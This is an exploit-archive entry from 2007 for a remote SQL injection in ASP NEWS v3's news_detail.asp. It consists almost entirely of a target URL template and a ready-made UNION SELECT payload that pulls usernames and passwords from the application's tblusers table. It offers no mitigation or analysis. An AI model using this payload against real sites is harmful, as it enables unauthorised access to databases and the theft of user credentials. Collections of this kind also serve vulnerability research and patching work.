id: 1419
date: 01/24/2007
title: ASP NEWS <= v3 (news_detail.asp) Remote SQL Injection Vulnerability
author: ajann
cves: 

===================================================================
ASP NEWS <= v3 (news_detail.asp) Remote SQL Injection Vulnerability
===================================================================



*******************************************************************************
# Title   :  ASP NEWS <= V3 (news_detail.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//news_detail.asp?id=[SQL]

Example:

//news_detail.asp?id=-1%20union%20select%200,username,password,0,0,0%20from%20tblusers

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!


#  0day.today [2023-03-22]  #